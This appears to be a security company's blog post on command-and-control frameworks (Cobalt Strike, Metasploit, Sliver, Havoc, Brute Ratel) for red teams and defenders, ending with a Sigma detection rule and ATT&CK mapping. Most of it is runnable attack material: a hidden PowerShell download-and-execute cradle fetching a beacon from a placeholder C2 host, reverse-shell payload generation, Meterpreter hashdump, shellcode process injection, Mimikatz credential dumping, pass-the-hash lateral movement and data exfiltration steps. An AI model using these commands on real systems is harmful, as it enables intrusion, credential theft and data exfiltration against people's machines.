In modern cyberattacks, breaking into a system is only the beginning. What happens next, how attackers maintain control, move laterally, and exfiltrate data, is where Command and Control (C2) frameworks come into play. Whether you are a penetration tester, a blue teamer trying to understand attacker behavior, or a security professional building defenses, understanding C2 frameworks is non-negotiable.
This blog breaks down what C2 frameworks are, how they work, the most popular tools in use today, and what defenders need to know to detect and disrupt them.
A Command and Control (C2) framework is a suite of tools that allows an attacker or red team operator to communicate with compromised systems (called "agents" or "implants") after initial access has been achieved. Think of it as the infrastructure that keeps an attacker in the driver's seat even after the initial exploit has run.
The C2 server acts as the mothership. Compromised machines "beacon" back to it at regular intervals, waiting for instructions. Those instructions can range from running a command, downloading additional payloads, escalating privileges, pivoting to internal systems, or exfiltrating sensitive data.
C2 frameworks are central to realistic penetration testing engagements. Without simulating post-exploitation behavior, a pentest is incomplete. Real adversaries do not just pop a shell and leave; they persist, they pivot, they exfiltrate. If your pentest does not replicate that behavior, critical detection gaps in your environment will go unnoticed.
If your organization wants to know how it holds up against a real-world intrusion, including post-exploitation, lateral movement, and data exfiltration scenarios, Redfox Cybersecurity's penetration testing services are built to simulate exactly that.
Understanding the communication model is key to both operating and detecting C2 frameworks.
After an implant is dropped on a target system, it does not sit idle waiting for a connection. Instead, it periodically reaches out to the C2 server in a pattern called beaconing. This keeps the communication channel alive while avoiding constant network noise that might trigger alerts.
A typical beacon cycle works like this:
Modern C2 frameworks are built to blend in with normal traffic. The most common channels include:
Cobalt Strike is arguably the most well-known commercial C2 framework in existence. Developed by Raphael Mudge and later acquired by HelpSystems (now Fortra), it is widely used by red teams and, unfortunately, threat actors who have obtained cracked versions.
Key Features:
Example: Generating a Stageless HTTPS Beacon
# On the Cobalt Strike team server (Linux)
./teamserver <C2_IP> <password> /path/to/malleable_profile.profile
# In the Cobalt Strike GUI:
# Attacks > Packages > Windows Executable (S)
# Select HTTPS listener, output: EXE, check "Use x64"
[cta]
Example: Spawning a Beacon via PowerShell One-Liner
powershell -nop -w hidden -c "IEX ((New-Object Net.WebClient).DownloadString('http://<C2_IP>/beacon.ps1'))"
[cta]
Example: Running a BOF to Enumerate Domain Admins
# In the Cobalt Strike console (beacon context)
beacon> execute-assembly /opt/tools/SharpView.exe Get-DomainGroupMember -Identity "Domain Admins"
[cta]
Metasploit is the most widely used open-source penetration testing framework. While it is often associated with exploitation, its post-exploitation capabilities through Meterpreter make it a fully functional C2 platform.
Example: Setting Up a Meterpreter Reverse HTTPS Listener
msfconsole
msf6 > use exploit/multi/handler
msf6 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_https
msf6 exploit(multi/handler) > set LHOST <your_IP>
msf6 exploit(multi/handler) > set LPORT 443
msf6 exploit(multi/handler) > set ExitOnSession false
msf6 exploit(multi/handler) > run -j
[cta]
Example: Generating a Meterpreter Payload with msfvenom
msfvenom -p windows/x64/meterpreter/reverse_https \
LHOST=<C2_IP> LPORT=443 \
-f exe -o payload.exe
[cta]
Example: Post-Exploitation with Meterpreter
meterpreter > getuid
meterpreter > getsystem
meterpreter > hashdump
meterpreter > run post/multi/recon/local_exploit_suggester
meterpreter > run post/windows/gather/credentials/credential_collector
[cta]
Sliver is an open-source C2 framework developed by Bishop Fox. It has quickly become a go-to alternative to Cobalt Strike for red teams, offering modern features without the commercial price tag.
Example: Starting the Sliver Server and Generating an Implant
# Start Sliver server
sliver-server
# Generate a beacon implant
sliver > generate beacon \
--http https://<C2_IP>:443 \
--os windows \
--arch amd64 \
--save /tmp/beacon.exe
# Start an HTTPS listener
sliver > https --lhost <C2_IP> --lport 443
Example: Interacting with a Sliver Session
sliver > sessions
sliver > use <session_id>
sliver (session) > info
sliver (session) > shell
sliver (session) > execute-assembly /opt/tools/Seatbelt.exe -group=system
[cta]
Havoc is a newer, open-source C2 framework that has gained significant traction in the red team community. It offers a modern GUI, encrypted communication, and support for Beacon Object Files.
Example: Starting the Havoc Teamserver
cd /opt/Havoc
./havoc server --profile ./profiles/havoc.yaotl -v
[cta]
Example: Generating a Havoc Demon Payload
# In the Havoc GUI:
# Payloads > Generate > Demon
# Set Listener: HTTPS
# Format: Windows EXE
# Sleep: 5s, Jitter: 20%
[cta]
Brute Ratel is a commercial adversary simulation platform built specifically to evade EDR solutions. It is designed with real-world threat actor TTPs (Tactics, Techniques, and Procedures) in mind and is frequently abused in the wild by nation-state actors.
Example: BRc4 Badger Profile Configuration (YAML)
network:
host: <C2_IP>
port: 443
protocol: https
sleep: 10
jitter: 30
badger:
arch: x64
format: exe
indirect_syscalls: true
etw_patch: true
[cta]
Operating a C2 server directly exposes its IP address to defenders. Redirectors, typically cloud-based proxies or CDN nodes, forward traffic from implants to the actual team server. This makes attribution harder and keeps the real C2 infrastructure hidden.
Implant --> Redirector (CDN/VPS) --> Team Server
Setting up a simple Apache redirector:
# Enable mod_rewrite and mod_proxy
a2enmod rewrite proxy proxy_http
# .htaccess rule to forward beacon traffic
RewriteEngine On
RewriteCond %{REQUEST_URI} ^/beacon.*$
RewriteRule ^(.*)$ https://<TEAM_SERVER_IP>/$1 [P,L]
[cta]
One of the most powerful evasion techniques is making C2 traffic look like legitimate web traffic. Cobalt Strike's malleable C2 profiles allow operators to configure HTTP headers, URIs, cookies, and response bodies to mimic real services like Microsoft Teams, OneDrive, or Amazon AWS.
# Example malleable profile snippet mimicking Microsoft Graph API
http-get {
set uri "/v1.0/me/messages";
client {
header "Accept" "application/json";
header "User-Agent" "Microsoft Graph Client";
metadata { base64url; prepend "graph_token="; header "Authorization"; }
}
}
[cta]
Modern C2 implants rarely write to disk. Instead, they execute entirely in memory using techniques like:
Process Injection:
# Inject shellcode into a remote process using PowerShell
$process = Get-Process explorer | Select-Object -First 1
$handle = OpenProcess(0x1F0FFF, $false, $process.Id)
$mem = VirtualAllocEx($handle, [IntPtr]::Zero, $shellcode.Length, 0x3000, 0x40)
WriteProcessMemory($handle, $mem, $shellcode, $shellcode.Length, [ref]0)
CreateRemoteThread($handle, [IntPtr]::Zero, 0, $mem, [IntPtr]::Zero, 0, [IntPtr]::Zero)
[cta]
Reflective DLL Injection: Loads a DLL from memory without touching disk, bypassing many AV solutions.
Understanding how to detect C2 traffic is just as important as knowing how to use these frameworks. Key detection strategies include:
title: Suspicious PowerShell Encoded Command
status: experimental
logsource:
category: process_creation
product: windows
detection:
selection:
Image|endswith: '\powershell.exe'
CommandLine|contains:
- '-EncodedCommand'
- '-enc '
- '-ec '
condition: selection
falsepositives:
- Legitimate admin scripts
level: medium
[cta]
Understanding attacker behavior at this level is exactly what separates a checkbox compliance exercise from a real security assessment. Redfox Cybersecurity conducts adversary simulation engagements that replicate full attack chains, from initial access through C2 establishment, lateral movement, and data exfiltration, so your detection capabilities are tested against realistic scenarios.
C2 frameworks directly map to several MITRE ATT&CK techniques. Every red team report should reference these:
TechniqueATT&CK IDDescriptionCommand and Control via HTTPT1071.001Beaconing over HTTP/HTTPSDNS C2T1071.004Commands tunneled via DNSProcess InjectionT1055Code injected into remote processesEncrypted ChannelT1573C2 traffic encrypted with TLSIngress Tool TransferT1105Downloading additional tools post-accessScheduled Task PersistenceT1053.005Maintaining access via task schedulerCredential DumpingT1003Extracting hashes and plaintext creds
Mapping your findings to ATT&CK is critical for communicating risk to stakeholders and aligning remediation to known threat actor behaviors.
A realistic red team engagement using a C2 framework typically follows this kill chain:
Phase 1: Initial AccessDeliver a payload via phishing, drive-by download, or exploitation of an external vulnerability.
Phase 2: Establish C2The payload executes, beacons back to the C2 server through a redirector, and a session is established.
Phase 3: Discovery
# Enumerate domain info via Seatbelt
execute-assembly /opt/Seatbelt.exe -group=system,user,remote
# Network discovery
shell net view /domain
shell nltest /dclist:<domain>
[cta]
Phase 4: Credential Access
# Dump credentials from LSASS using Mimikatz via C2
execute-assembly /opt/Mimikatz.exe "sekurlsa::logonpasswords" "exit"
[cta]
Phase 5: Lateral Movement
# Pass-the-hash lateral movement
shell wmic /node:<target_IP> /user:<domain>\<user> /password:<NTLM_hash> process call create "cmd.exe /c <command>"
[cta]
Phase 6: Exfiltration Simulation
# Compress and exfil a sample data set to demonstrate impact
shell 7z a -tzip C:\Users\Public\data.zip C:\Users\<user>\Documents\*.xlsx
download C:\Users\Public\data.zip
[cta]
If your organization has never been put through a full-chain engagement like this, your incident response team is operating without critical data. Redfox Cybersecurity's red team and penetration testing services deliver these engagements with detailed reporting, MITRE ATT&CK mapping, and actionable remediation guidance tailored to your environment.
C2 frameworks are the backbone of post-exploitation operations, both for legitimate red teams and real-world threat actors. Tools like Cobalt Strike, Sliver, Havoc, and Metasploit give operators granular control over compromised systems, enabling sophisticated attack scenarios that test defenses far beyond what automated scanners can achieve.
For defenders, understanding how these frameworks operate is the first step toward building detections that actually work. For organizations, commissioning a realistic adversary simulation is the only way to know whether those detections hold up under pressure.
If you are ready to find out how your environment performs against a real C2-based attack scenario, Redfox Cybersecurity is ready to run that test. From web application penetration testing and network assessments to full red team operations, the team at Redfox Cybersecurity delivers engagements that produce real answers, not just green checkmarks.
Take the next step. Explore Redfox Cybersecurity's services and book your assessment today.
Redfox Cyber Security Inc.
8 The Green, Ste. A, Dover,
Delaware 19901,
United States.
.avif)
